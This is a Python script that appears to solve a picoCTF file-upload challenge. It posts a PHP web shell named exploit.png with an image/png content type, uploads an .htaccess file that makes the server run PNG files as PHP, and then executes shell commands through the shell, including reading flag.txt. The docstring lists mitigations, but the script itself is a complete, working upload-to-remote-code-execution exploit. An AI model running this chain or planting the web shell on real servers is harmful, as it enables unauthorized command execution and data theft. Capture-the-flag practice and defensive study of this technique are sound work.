#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ requests ])"
import requests
# Root of the challenge instance (a picoctf.net host, per the name); every
# request in main() is built by appending a path to this value.
BASE_URL = "http://amiable-citadel.picoctf.net:53954"
def main():
    """Replay the four-request upload walkthrough against ``BASE_URL``.

    In order, the script:

    1. POSTs a file named ``exploit.png`` to ``/upload.php``. The part is
       declared as ``image/png`` but its bytes are a PHP snippet that hands
       the ``cmd`` query parameter to ``system()``.
    2. POSTs a second file named ``.htaccess`` holding a single
       ``SetHandler`` directive to the same endpoint.
    3. GETs ``/images/exploit.png`` twice, with a different ``cmd`` value
       each time.

    After every request the response object and its body are printed; a
    dashed divider is printed between requests (not after the last one).

    Defensive reading: the chain only works if the upload handler keeps the
    client-supplied filename (including a leading dot), does not check that
    the content really is an image, and stores files in a web-served
    directory where per-directory overrides are honoured. Server-generated
    filenames, content validation, rejecting dotfiles, and disabling
    overrides / script handlers for the upload directory (for example
    ``AllowOverride None``) each break it. The server side is not shown on
    this page, so the above is inferred from what the script sends.
    """
    divider = '-------------------------------'
    upload_url = BASE_URL + "/upload.php"

    def show(reply):
        # Status line first, then the raw body, exactly as received.
        print(reply)
        print(reply.text)

    # Extension and Content-Type are both chosen by the client; only the
    # bytes say what the file really is. The literal is kept at column 0 so
    # its content matches the listing.
    php_body = b'''
<?php
system($_GET['cmd'] . ' 2>&1');
?>
'''

    # One directive, uploaded under a dotfile name. Presumably the server
    # saves it next to the first file; that is an assumption, not something
    # visible here.
    handler_rule = b'SetHandler php-script'

    uploads = (
        ('exploit.png', php_body, 'image/png'),
        ('.htaccess', handler_rule, 'text/plain'),
    )
    for part in uploads:
        reply = requests.post(
            upload_url,
            files={
                'image': part,
                'submit': 'Upload ID',
            },
        )
        show(reply)
        print(divider)

    # The /images/ prefix is where the script expects uploads to be served
    # from. The command string is interpolated into the URL as-is.
    commands = ("ls -lah ../..", "cat ../../flag.txt")
    for position, cmd in enumerate(commands):
        if position:
            print(divider)
        reply = requests.get(BASE_URL + f"/images/exploit.png?cmd={cmd}")
        show(reply)
# Entry-point guard: run the walkthrough only when the file is executed
# directly, not when it is imported.
if __name__ == "__main__":
    main()